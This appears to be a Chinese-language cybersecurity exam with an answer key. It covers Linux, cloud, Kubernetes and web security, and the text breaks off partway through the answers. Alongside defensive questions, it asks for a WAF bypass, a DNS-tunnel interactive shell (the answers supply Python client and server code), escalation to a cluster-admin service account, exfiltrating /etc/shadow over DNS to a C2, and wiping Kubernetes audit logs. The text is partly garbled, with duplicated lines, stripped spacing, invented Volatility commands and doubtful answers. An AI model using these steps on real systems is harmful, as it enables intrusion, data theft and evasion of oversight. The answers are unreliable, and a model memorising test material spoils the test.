2026年网络安全专家实操技能检测试卷及答案

2026年网络安全专家实操技能检测试卷及答案1.单选题（每题2分，共20分）1.1在Linux系统中，以下哪条命令可以一次性列出当前所有TCP监听端口及其对应的进程PID？A.netstat-tulnpB.ss-antC.lsof-iTCP-sTCP:LISTEND.nmap-sT-Olocalhost1.2某企业使用EDR检测到某台Windows10主机频繁向外部IP7的443端口发起TLS1.3会话，但进程名每次重启都会变化。以下哪种技术最可能被攻击者用于隐藏进程？A.DLL劫持B.ProcessDoppelgängingC.ETWbypassD.ParentPIDSpoofing1.3在一次红队演练中，需要绕过某WAF对关键字“unionselect”的检测，下列哪种变形在MySQL8.0环境下仍可成功执行且不会被该WAF正则`union\s+select`拦截？A.un//ionsel//ectB.union%09selectC.union%0AselectD.union%250aselect1.4某云函数（Lambda）使用临时AK/SK访问S3，Policy中允许`s3:GetObject`且Resource为``。以下哪种方法可在不修改Policy的前提下，实现“仅允许访问名字带audit前缀的bucket”？1.4某云函数（Lambda）使用临时AK/SK访问S3，Policy中允许`s3:GetObject`且Resource为``。以下哪种方法可在不修改Policy的前提下，实现“仅允许访问名字带audit前缀的bucket”？A.在Lambda代码里先列举bucket再过滤B.启用S3bucketpolicy显式Deny非audit前缀C.创建S3AccessPoint并绑定LambdaD.使用IAMConditionStringLike:s3:prefix1.5在Kubernetes集群中，以下哪条RBAC规则组合可让ServiceAccount仅能读取default命名空间下的Pod日志？A.verbs=get,list;resources=pods/log;apiGroups=“”B.verbs=get;resources=pods;apiGroups=“”;resourceNames=/logB.verbs=get;resources=pods;apiGroups=“”;resourceNames=/logC.verbs=get;resources=pods/log;apiGroups=“”;namespaces=defaultD.verbs=get;resources=pods/log;apiGroups=“”;scope=Namespace1.6某内网主机通过IPv6Only访问互联网，防火墙禁止v4出站。攻击者通过DNS隧道外传数据，以下哪种DNS记录类型在IPv6单栈环境下仍能实现最大单请求携带字节数？A.AAAAB.TXTC.CNAMED.PTR1.7在ARM64Android14系统上，某应用使用flutter.so，通过seccomp过滤掉了`open`系统调用。攻击者欲读取/data/data/包名/secret.xml，以下哪种利用链最可行？A.调用`openat(AT_FDCWD,...,0)`B.调用`fopen`并依赖libc封装C.使用memfd_create+sendfileD.通过`/proc/self/maps`找到libc基址再syscall1.8某企业采用零信任架构，所有流量强制mTLS。以下哪种方式可在不窃取客户端证书私钥的前提下，实现对浏览器流量的被动解密？A.在端点植入TLSHooking驱动B.导出SSLKEYLOGFILE环境变量并收集C.使用eBPF在tcp_sendmsg处dump明文D.向CA申请证书透明日志1.9在WindowsServer2025中，启用CredentialGuard后，以下哪项攻击仍能直接获取NTLMHash？A.Mimikatzsekurlsa::logonpasswordsB.Keylogger在Winlogon.exeC.RDPShadowingD.DumpLSAIsolatedUserMode1.10某API使用JWT（RS256），公钥可通过/jwks.json获取。攻击者发现公钥字段`n`末尾被填充了两个字节0x00，以下哪种利用可伪造任意token？A.将JWTalg改为HS256，用公钥做HMACB.构造低指数e=3攻击C.构造Bleichenbacher攻击D.构造InvalidCurve攻击2.多选题（每题3分，共15分；多选少选均不得分）2.1关于IntelCET（Control-flowEnforcementTechnology）机制，以下说法正确的是：A.ShadowStack仅保护RET指令B.IndirectBranchTracking通过ENDBR指令标记合法目标C.在VMXroot模式下CET自动失效D.可通过ROP绕过ShadowStack但无法绕过IBT2.2以下哪些HTTP响应头组合，可在现代浏览器中同时缓解XS-Leaks、Clickjacking、MIMESniffing？A.Cross-Origin-Opener-Policy:same-originB.X-Frame-Options:DENYC.X-Content-Type-Options:nosniffD.Permissions-Policy:geolocation=()2.3在AWS环境中，以下哪些日志源可用来检测AK/SK被外泄到公网GitHub？A.CloudTrailLakeB.GuardDutyFinding:Policy:IAMUser/AccessKeyExposedC.ConfigRule:iam-access-key-rotationD.SecurityHubStandard:CIS1.42.4关于eBPF安全，下列哪些说法正确？A.非特权用户可加载eBPF程序需内核编译时开启CONFIG_BPF_UNPRIVB.eBPFverifier会拒绝包含循环的程序C.eBPF程序可通过BPF_PROG_TYPE_KPROBE实现内核函数HookD.eBPFMap可用于用户态与内核态双向通信2.5在Linux内核5.15中，以下哪些防御机制可有效阻断传统ret2usr攻击？A.SMEPB.SMAPC.KPTID.CFI3.判断题（每题1分，共10分；正确打“√”，错误打“×”）3.1在Windows1124H2中，启用VBS后，即使获取内核任意写，也无法直接修改EPROCESS.Token。3.2DNS-over-HTTPS（DoH）默认使用TLS1.3，因此中间人无法通过JA3/JA3S指纹进行SNI过滤。3.3在iOS18中，若App使用AppAttest，则服务端可100%杜绝越狱设备伪造attestation。3.4使用ChaCha20-Poly1305比AES-GCM更能抵抗Cache-Timing攻击，原因在于ChaCha20完全基于ARX操作。3.5在Kubernetes1.30中，即使etcd启用TLS，若apiserver的audit日志级别为None，仍无法发现谁删除了secret。3.6ARMv9的CCA（ConfidentialComputeArchitecture）允许虚拟机在不信任Hypervisor的情况下运行加密内存域。3.7在GPT-4o模型私有化部署中，若使用同态加密进行推理，则无需担心模型参数被逆向。3.8在Linux中，若/proc/sys/kernel/kptr_restrict=2，则非root用户读取/proc/kallsyms将返回全0地址。3.9使用HTTP/3QUIC时，由于基于UDP，传统状态防火墙无法做会话保持，因此必须关闭UDPflood防御。3.10在零信任网络中，SPA（SinglePacketAuthorization）技术可在网络层先于TCP三次握手完成身份认证。4.简答题（每题10分，共30分）4.1某电商网站使用GraphQL，发现可通过批量查询接口一次性请求10000个订单详情，导致数据库CPU飙升。请给出三种无需修改前端代码的防御方案，并说明各自优缺点。4.2某勒索软件采用Curve25519+ChaCha20+Poly1305进行文件加密，加密后删除原文件并覆写MFT。已获取内存镜像，请描述如何恢复被加密的文件密钥，并给出关键Volatility3命令。4.3某内网DNS服务器仅允许53/udp出站，现需通过DNS隧道建立交互式Shell，请给出server端与client端的核心Python代码片段（不超过60行），并说明如何分片传输大于255字节的指令。5.综合实操题（共25分）背景：A集团采用双活数据中心，核心资产为一套基于SpringBoot3.2的微服务集群，注册中心使用Nacos2.4，网关使用SpringCloudGateway4.1，数据库使用MySQL8.0（主从+GTID），缓存使用Redis7.2Cluster，消息队列使用Kafka3.7，所有组件部署在Kubernetes1.30（CiliumCNI，启用WireGuard加密）。红队已获得某开发笔记本的SSH私钥，可跳转至开发测试命名空间dev-ns，但无法访问生产命名空间prod-ns。目标：获取prod-ns中order-svc的MySQL主库root密码，并外泄至公网C2（:53/udp）。5.1信息收集（5分）请写出在dev-ns中，利用Kubernetes原生资源，不落地文件，获取prod-ns中所有ServiceAccount名字的完整kubectl命令链。5.2权限提升（5分）发现dev-ns的defaultSA绑定了cluster-admin，请给出利用该SA创建跨namespacePod的YAML，要求Pod内自动挂载prod-ns的ServiceAccounttoken并执行sleep3600。5.3横向移动（5分）进入prod-ns后，通过sidecar容器无SSH、无telnet，仅拥有curl，请给出利用MySQL8.0的local-infile特性读取/etc/shadow的完整curl命令（假设MySQL服务为d-ns.svc.cluster.local:3306，已获取账号dev_user:DevPass123）。5.4密码外泄（5分）由于出口防火墙仅允许DNSudp/53，请给出在sidecar容器内，使用bash内置功能，将/etc/shadow拆片并通过DNS外泄的完整单行命令（要求base64编码，每标签≤63字符，使用作为解析服务器）。5.5痕迹清除（5分）请给出在Kubernetes1.30环境中，删除audit日志中指定Pod创建事件的完整步骤，需覆盖kube-apiserver、etcd、audit-webhook三处日志，并说明为何无法100%清除。卷后答案与解析1.单选题1.1A解析：ss虽快，但无-p参数时不显示PID；lsof需额外过滤；nmap为扫描器。1.2B解析：ProcessDoppelgänging可在创建时替换内存映像，导致进程名动态变化。1.3B解析：%09（Tab）未被正则覆盖，且MySQL仍识别为空白。1.4B解析：S3bucketpolicy显式Deny优先级高于Allow，可实现细粒度控制。1.5A解析：pods/log子资源在RBAC中独立，且verbs需包含get。1.6B解析：TXT记录最大512字节，IPv6单栈下仍适用。1.7A解析：seccomp过滤open，但openat使用不同系统调用号。1.8B解析：SSLKEYLOGFILE可导出密钥，供Wireshark离线解密，无需修改端点。1.9B解析：CredentialGuard隔离LSA，但键盘记录可在登录层截获。1.10A解析：将alg改为HS256后，用RSA公钥作HMAC密钥即可伪造。2.多选题2.1ABD2.2ABCD2.3AB2.4ACD2.5ABC3.判断题3.1√3.2×（JA3指纹仍可通过ClientHello特征识别）3.3×（越狱设备可伪造AppAttest签名）3.4√3.5×（audit为None不记录，但etcdevent仍存key名）3.6√3.7×（同态加密推理效率极低，实际未部署）3.8√3.9×（防火墙可跟踪QUICConnectionID）3.10√4.简答题4.1方案一：GraphQLRateLimiting（基于复杂度评分），优点：精准；缺点：需网关支持。方案二：DataLoader批量合并SQL，优点：减少数据库连接；缺点：需后端改造。方案三：Redis缓存预热，优点：降低数据库压力；缺点：缓存击穿风险。4.2步骤：1.定位内存中ChaCha20密钥：vol-fmem.rawwindows.crypto.ChaCha202.提取Curve25519私钥：vol-fmem.rawlinux.lsmod|grepchacha3.使用Montgomeryladder计算共享密钥4.解密文件：chacha20poly1305.decrypt(key,nonce,ciphertext)4.3服务端：```pythonimportsocket,base64s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)s.bind(('',53))while1:d,a=s.recvfrom(512)q=d.decode().split('.')[0]print(base64.b64decode(q).decode())s.sendto(b'\x00',a)```客户端分片：```pythonimportos,base64,socketdata=b'cmd'+os.urandom(16)+b'getflag'foriinrange(0,len(data),63):label=base64.b64encode(data[i:i+63])socket.socket(socket.AF_INET,socket.SOCK_DGRAM).sendto(label+b'.x',('',53))```5.综合实操题答案5.1kubectlgetsa-nprod-ns--token=$(kubectlcreatetokendefault-ndev-ns)--server=https://kubernetes.default.svc--certificate-authority=/var/run